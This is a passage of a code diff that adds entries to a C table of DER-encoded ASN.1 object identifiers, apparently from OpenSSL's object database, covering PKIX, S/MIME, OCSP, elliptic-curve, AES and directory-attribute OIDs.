+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x06,0x04,/* [1833] OBJ_id_smime_cti_ets_proofOfSender */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x06,0x05,/* [1844] OBJ_id_smime_cti_ets_proofOfApproval */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x09,0x10,0x06,0x06,/* [1855] OBJ_id_smime_cti_ets_proofOfCreation */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x02,0x04,     /* [1866] OBJ_md4 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,          /* [1874] OBJ_id_pkix_mod */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x02,          /* [1881] OBJ_id_qt */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,          /* [1888] OBJ_id_it */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x05,          /* [1895] OBJ_id_pkip */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x06,          /* [1902] OBJ_id_alg */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,          /* [1909] OBJ_id_cmc */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x08,          /* [1916] OBJ_id_on */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x09,          /* [1923] OBJ_id_pda */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0A,          /* [1930] OBJ_id_aca */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0B,          /* [1937] OBJ_id_qcs */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0C,          /* [1944] OBJ_id_cct */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x01,     /* [1951] OBJ_id_pkix1_explicit_88 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x02,     /* [1959] OBJ_id_pkix1_implicit_88 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x03,     /* [1967] OBJ_id_pkix1_explicit_93 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x04,     /* [1975] OBJ_id_pkix1_implicit_93 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x05,     /* [1983] OBJ_id_mod_crmf */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x06,     /* [1991] OBJ_id_mod_cmc */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x07,     /* [1999] OBJ_id_mod_kea_profile_88 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x08,     /* [2007] OBJ_id_mod_kea_profile_93 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x09,     /* [2015] OBJ_id_mod_cmp */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x0A,     /* [2023] OBJ_id_mod_qualified_cert_88 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x0B,     /* [2031] OBJ_id_mod_qualified_cert_93 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x0C,     /* [2039] OBJ_id_mod_attribute_cert */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x0D,     /* [2047] OBJ_id_mod_timestamp_protocol */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x0E,     /* [2055] OBJ_id_mod_ocsp */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x0F,     /* [2063] OBJ_id_mod_dvcs */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x00,0x10,     /* [2071] OBJ_id_mod_cmp2000 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x02,     /* [2079] OBJ_biometricInfo */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x03,     /* [2087] OBJ_qcStatements */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x04,     /* [2095] OBJ_ac_auditEntity */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x05,     /* [2103] OBJ_ac_targeting */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x06,     /* [2111] OBJ_aaControls */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x07,     /* [2119] OBJ_sbgp_ipAddrBlock */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x08,     /* [2127] OBJ_sbgp_autonomousSysNum */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x09,     /* [2135] OBJ_sbgp_routerIdentifier */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x02,0x03,     /* [2143] OBJ_textNotice */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x03,0x05,     /* [2151] OBJ_ipsecEndSystem */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x03,0x06,     /* [2159] OBJ_ipsecTunnel */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x03,0x07,     /* [2167] OBJ_ipsecUser */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x03,0x0A,     /* [2175] OBJ_dvcs */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x01,     /* [2183] OBJ_id_it_caProtEncCert */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x02,     /* [2191] OBJ_id_it_signKeyPairTypes */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x03,     /* [2199] OBJ_id_it_encKeyPairTypes */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x04,     /* [2207] OBJ_id_it_preferredSymmAlg */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x05,     /* [2215] OBJ_id_it_caKeyUpdateInfo */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x06,     /* [2223] OBJ_id_it_currentCRL */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x07,     /* [2231] OBJ_id_it_unsupportedOIDs */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x08,     /* [2239] OBJ_id_it_subscriptionRequest */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x09,     /* [2247] OBJ_id_it_subscriptionResponse */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x0A,     /* [2255] OBJ_id_it_keyPairParamReq */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x0B,     /* [2263] OBJ_id_it_keyPairParamRep */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x0C,     /* [2271] OBJ_id_it_revPassphrase */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x0D,     /* [2279] OBJ_id_it_implicitConfirm */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x0E,     /* [2287] OBJ_id_it_confirmWaitTime */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x04,0x0F,     /* [2295] OBJ_id_it_origPKIMessage */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x05,0x01,     /* [2303] OBJ_id_regCtrl */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x05,0x02,     /* [2311] OBJ_id_regInfo */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x05,0x01,0x01,/* [2319] OBJ_id_regCtrl_regToken */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x05,0x01,0x02,/* [2328] OBJ_id_regCtrl_authenticator */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x05,0x01,0x03,/* [2337] OBJ_id_regCtrl_pkiPublicationInfo */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x05,0x01,0x04,/* [2346] OBJ_id_regCtrl_pkiArchiveOptions */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x05,0x01,0x05,/* [2355] OBJ_id_regCtrl_oldCertID */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x05,0x01,0x06,/* [2364] OBJ_id_regCtrl_protocolEncrKey */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x05,0x02,0x01,/* [2373] OBJ_id_regInfo_utf8Pairs */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x05,0x02,0x02,/* [2382] OBJ_id_regInfo_certReq */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x06,0x01,     /* [2391] OBJ_id_alg_des40 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x06,0x02,     /* [2399] OBJ_id_alg_noSignature */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x06,0x03,     /* [2407] OBJ_id_alg_dh_sig_hmac_sha1 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x06,0x04,     /* [2415] OBJ_id_alg_dh_pop */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x01,     /* [2423] OBJ_id_cmc_statusInfo */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x02,     /* [2431] OBJ_id_cmc_identification */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x03,     /* [2439] OBJ_id_cmc_identityProof */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x04,     /* [2447] OBJ_id_cmc_dataReturn */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x05,     /* [2455] OBJ_id_cmc_transactionId */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x06,     /* [2463] OBJ_id_cmc_senderNonce */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x07,     /* [2471] OBJ_id_cmc_recipientNonce */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x08,     /* [2479] OBJ_id_cmc_addExtensions */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x09,     /* [2487] OBJ_id_cmc_encryptedPOP */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x0A,     /* [2495] OBJ_id_cmc_decryptedPOP */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x0B,     /* [2503] OBJ_id_cmc_lraPOPWitness */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x0F,     /* [2511] OBJ_id_cmc_getCert */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x10,     /* [2519] OBJ_id_cmc_getCRL */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x11,     /* [2527] OBJ_id_cmc_revokeRequest */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x12,     /* [2535] OBJ_id_cmc_regInfo */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x13,     /* [2543] OBJ_id_cmc_responseInfo */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x15,     /* [2551] OBJ_id_cmc_queryPending */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x16,     /* [2559] OBJ_id_cmc_popLinkRandom */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x17,     /* [2567] OBJ_id_cmc_popLinkWitness */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x07,0x18,     /* [2575] OBJ_id_cmc_confirmCertAcceptance */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x08,0x01,     /* [2583] OBJ_id_on_personalData */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x09,0x01,     /* [2591] OBJ_id_pda_dateOfBirth */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x09,0x02,     /* [2599] OBJ_id_pda_placeOfBirth */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x09,0x03,     /* [2607] OBJ_id_pda_gender */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x09,0x04,     /* [2615] OBJ_id_pda_countryOfCitizenship */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x09,0x05,     /* [2623] OBJ_id_pda_countryOfResidence */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0A,0x01,     /* [2631] OBJ_id_aca_authenticationInfo */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0A,0x02,     /* [2639] OBJ_id_aca_accessIdentity */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0A,0x03,     /* [2647] OBJ_id_aca_chargingIdentity */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0A,0x04,     /* [2655] OBJ_id_aca_group */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0A,0x05,     /* [2663] OBJ_id_aca_role */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0B,0x01,     /* [2671] OBJ_id_qcs_pkixQCSyntax_v1 */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0C,0x01,     /* [2679] OBJ_id_cct_crs */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0C,0x02,     /* [2687] OBJ_id_cct_PKIData */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0C,0x03,     /* [2695] OBJ_id_cct_PKIResponse */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x03,     /* [2703] OBJ_ad_timeStamping */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x04,     /* [2711] OBJ_ad_dvcs */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,0x01,/* [2719] OBJ_id_pkix_OCSP_basic */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,0x02,/* [2728] OBJ_id_pkix_OCSP_Nonce */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,0x03,/* [2737] OBJ_id_pkix_OCSP_CrlID */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,0x04,/* [2746] OBJ_id_pkix_OCSP_acceptableResponses */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,0x05,/* [2755] OBJ_id_pkix_OCSP_noCheck */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,0x06,/* [2764] OBJ_id_pkix_OCSP_archiveCutoff */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,0x07,/* [2773] OBJ_id_pkix_OCSP_serviceLocator */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,0x08,/* [2782] OBJ_id_pkix_OCSP_extendedStatus */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,0x09,/* [2791] OBJ_id_pkix_OCSP_valid */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,0x0A,/* [2800] OBJ_id_pkix_OCSP_path */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x30,0x01,0x0B,/* [2809] OBJ_id_pkix_OCSP_trustRoot */
+0x2B,0x0E,0x03,0x02,                         /* [2818] OBJ_algorithm */
+0x2B,0x0E,0x03,0x02,0x0B,                    /* [2822] OBJ_rsaSignature */
+0x55,0x08,                                   /* [2827] OBJ_X500algorithms */
+0x2B,                                        /* [2829] OBJ_org */
+0x2B,0x06,                                   /* [2830] OBJ_dod */
+0x2B,0x06,0x01,                              /* [2832] OBJ_iana */
+0x2B,0x06,0x01,0x01,                         /* [2835] OBJ_Directory */
+0x2B,0x06,0x01,0x02,                         /* [2839] OBJ_Management */
+0x2B,0x06,0x01,0x03,                         /* [2843] OBJ_Experimental */
+0x2B,0x06,0x01,0x04,                         /* [2847] OBJ_Private */
+0x2B,0x06,0x01,0x05,                         /* [2851] OBJ_Security */
+0x2B,0x06,0x01,0x06,                         /* [2855] OBJ_SNMPv2 */
+0x2B,0x06,0x01,0x07,                         /* [2859] OBJ_Mail */
+0x2B,0x06,0x01,0x04,0x01,                    /* [2863] OBJ_Enterprises */
+0x2B,0x06,0x01,0x04,0x01,0x8B,0x3A,0x82,0x58,/* [2868] OBJ_dcObject */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x19,/* [2877] OBJ_domainComponent */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x0D,/* [2887] OBJ_Domain */
+0x55,0x01,0x05,                              /* [2897] OBJ_selected_attribute_types */
+0x55,0x01,0x05,0x37,                         /* [2900] OBJ_clearance */
+0x2A,0x86,0x48,0x86,0xF7,0x0D,0x01,0x01,0x03,/* [2904] OBJ_md4WithRSAEncryption */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x0A,     /* [2913] OBJ_ac_proxying */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x01,0x0B,     /* [2921] OBJ_sinfo_access */
+0x2B,0x06,0x01,0x05,0x05,0x07,0x0A,0x06,     /* [2929] OBJ_id_aca_encAttrs */
+0x55,0x04,0x48,                              /* [2937] OBJ_role */
+0x55,0x1D,0x24,                              /* [2940] OBJ_policy_constraints */
+0x55,0x1D,0x37,                              /* [2943] OBJ_target_information */
+0x55,0x1D,0x38,                              /* [2946] OBJ_no_rev_avail */
+0x2A,0x86,0x48,0xCE,0x3D,                    /* [2949] OBJ_ansi_X9_62 */
+0x2A,0x86,0x48,0xCE,0x3D,0x01,0x01,          /* [2954] OBJ_X9_62_prime_field */
+0x2A,0x86,0x48,0xCE,0x3D,0x01,0x02,          /* [2961] OBJ_X9_62_characteristic_two_field */
+0x2A,0x86,0x48,0xCE,0x3D,0x02,0x01,          /* [2968] OBJ_X9_62_id_ecPublicKey */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x01,0x01,     /* [2975] OBJ_X9_62_prime192v1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x01,0x02,     /* [2983] OBJ_X9_62_prime192v2 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x01,0x03,     /* [2991] OBJ_X9_62_prime192v3 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x01,0x04,     /* [2999] OBJ_X9_62_prime239v1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x01,0x05,     /* [3007] OBJ_X9_62_prime239v2 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x01,0x06,     /* [3015] OBJ_X9_62_prime239v3 */
+0x2A,0x86,0x48,0xCE,0x3D,0x03,0x01,0x07,     /* [3023] OBJ_X9_62_prime256v1 */
+0x2A,0x86,0x48,0xCE,0x3D,0x04,0x01,          /* [3031] OBJ_ecdsa_with_SHA1 */
+0x2B,0x06,0x01,0x04,0x01,0x82,0x37,0x11,0x01,/* [3038] OBJ_ms_csp_name */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x01,/* [3047] OBJ_aes_128_ecb */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x02,/* [3056] OBJ_aes_128_cbc */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x03,/* [3065] OBJ_aes_128_ofb128 */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x04,/* [3074] OBJ_aes_128_cfb128 */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x15,/* [3083] OBJ_aes_192_ecb */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x16,/* [3092] OBJ_aes_192_cbc */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x17,/* [3101] OBJ_aes_192_ofb128 */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x18,/* [3110] OBJ_aes_192_cfb128 */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x29,/* [3119] OBJ_aes_256_ecb */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x2A,/* [3128] OBJ_aes_256_cbc */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x2B,/* [3137] OBJ_aes_256_ofb128 */
+0x60,0x86,0x48,0x01,0x65,0x03,0x04,0x01,0x2C,/* [3146] OBJ_aes_256_cfb128 */
+0x55,0x1D,0x17,                              /* [3155] OBJ_hold_instruction_code */
+0x2A,0x86,0x48,0xCE,0x38,0x02,0x01,          /* [3158] OBJ_hold_instruction_none */
+0x2A,0x86,0x48,0xCE,0x38,0x02,0x02,          /* [3165] OBJ_hold_instruction_call_issuer */
+0x2A,0x86,0x48,0xCE,0x38,0x02,0x03,          /* [3172] OBJ_hold_instruction_reject */
+0x09,                                        /* [3179] OBJ_data */
+0x09,0x92,0x26,                              /* [3180] OBJ_pss */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,          /* [3183] OBJ_ucl */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,     /* [3190] OBJ_pilot */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,/* [3198] OBJ_pilotAttributeType */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x03,/* [3207] OBJ_pilotAttributeSyntax */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,/* [3216] OBJ_pilotObjectClass */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x0A,/* [3225] OBJ_pilotGroups */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x03,0x04,/* [3234] OBJ_iA5StringSyntax */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x03,0x05,/* [3244] OBJ_caseIgnoreIA5StringSyntax */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x03,/* [3254] OBJ_pilotObject */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x04,/* [3264] OBJ_pilotPerson */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x05,/* [3274] OBJ_account */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x06,/* [3284] OBJ_document */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x07,/* [3294] OBJ_room */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x09,/* [3304] OBJ_documentSeries */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x0E,/* [3314] OBJ_rFC822localPart */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x0F,/* [3324] OBJ_dNSDomain */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x11,/* [3334] OBJ_domainRelatedObject */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x12,/* [3344] OBJ_friendlyCountry */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x13,/* [3354] OBJ_simpleSecurityObject */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x14,/* [3364] OBJ_pilotOrganization */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x15,/* [3374] OBJ_pilotDSA */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x04,0x16,/* [3384] OBJ_qualityLabelledData */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x01,/* [3394] OBJ_userId */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x02,/* [3404] OBJ_textEncodedORAddress */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x03,/* [3414] OBJ_rfc822Mailbox */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x04,/* [3424] OBJ_info */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x05,/* [3434] OBJ_favouriteDrink */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x06,/* [3444] OBJ_roomNumber */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x07,/* [3454] OBJ_photo */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x08,/* [3464] OBJ_userClass */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x09,/* [3474] OBJ_host */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x0A,/* [3484] OBJ_manager */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x0B,/* [3494] OBJ_documentIdentifier */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x0C,/* [3504] OBJ_documentTitle */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x0D,/* [3514] OBJ_documentVersion */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x0E,/* [3524] OBJ_documentAuthor */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x0F,/* [3534] OBJ_documentLocation */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x14,/* [3544] OBJ_homeTelephoneNumber */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x15,/* [3554] OBJ_secretary */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x16,/* [3564] OBJ_otherMailbox */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x17,/* [3574] OBJ_lastModifiedTime */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x18,/* [3584] OBJ_lastModifiedBy */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x1A,/* [3594] OBJ_aRecord */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x1B,/* [3604] OBJ_pilotAttributeType27 */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x1C,/* [3614] OBJ_mXRecord */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x1D,/* [3624] OBJ_nSRecord */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x1E,/* [3634] OBJ_sOARecord */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x1F,/* [3644] OBJ_cNAMERecord */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x25,/* [3654] OBJ_associatedDomain */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x26,/* [3664] OBJ_associatedName */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x27,/* [3674] OBJ_homePostalAddress */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x28,/* [3684] OBJ_personalTitle */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x29,/* [3694] OBJ_mobileTelephoneNumber */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x2A,/* [3704] OBJ_pagerTelephoneNumber */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x2B,/* [3714] OBJ_friendlyCountryName */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x2D,/* [3724] OBJ_organizationalStatus */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x2E,/* [3734] OBJ_janetMailbox */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x2F,/* [3744] OBJ_mailPreferenceOption */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x30,/* [3754] OBJ_buildingName */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x31,/* [3764] OBJ_dSAQuality */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x32,/* [3774] OBJ_singleLevelQuality */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x33,/* [3784] OBJ_subtreeMinimumQuality */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x34,/* [3794] OBJ_subtreeMaximumQuality */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x35,/* [3804] OBJ_personalSignature */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x36,/* [3814] OBJ_dITRedirect */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x37,/* [3824] OBJ_audio */
+0x09,0x92,0x26,0x89,0x93,0xF2,0x2C,0x64,0x01,0x38,/* [3834] OBJ_documentPublisher */
+0x55,0x04,0x2D,                              /* [3844] OBJ_x500UniqueIdentifier */
+0x2B,0x06,0x01,0x07,0x01,                    /* [3847] OBJ_mime_mhs */
+0x2B,0x06,0x01,0x07,0x01,0x01,               /* [3852] OBJ_mime_mhs_headings */
+0x2B,0x06,0x01,0x07,0x01,0x02,               /* [3858] OBJ_mime_mhs_bodies */
+0x2B,0x06,0x01,0x07,0x01,0x01,0x01,          /* [3864] OBJ_id_hex_partial_message */
+0x2B,0x06,0x01,0x07,0x01,0x01,0x02,          /* [3871] OBJ_id_hex_multipart_message */
+0x55,0x04,0x2C,                              /* [3878] OBJ_generationQualifier */
+0x55,0x04,0x41,                              /* [3881] OBJ_pseudonym */
+0x67,0x2A,                                   /* [3884] OBJ_id_set */
+0x67,0x2A,0x00,                              /* [3886] OBJ_set_ctype */
+0x67,0x2A,0x01,                              /* [3889] OBJ_set_msgExt */
+0x67,0x2A,0x03,                              /* [3892] OBJ_set_attr */
+0x67,0x2A,0x05,                              /* [3895] OBJ_set_policy */
+0x67,0x2A,0x07,                              /* [3898] OBJ_set_certExt */
+0x67,0x2A,0x08,                              /* [3901] OBJ_set_brand */
+0x67,0x2A,0x00,0x00,                         /* [3904] OBJ_setct_PANData */
+0x67,0x2A,0x00,0x01,                         /* [3908] OBJ_setct_PANToken */
+0x67,0x2A,0x00,0x02,                         /* [3912] OBJ_setct_PANOnly */
+0x67,0x2A,0x00,0x03,                         /* [3916] OBJ_setct_OIData */
+0x67,0x2A,0x00,0x04,                         /* [3920] OBJ_setct_PI */
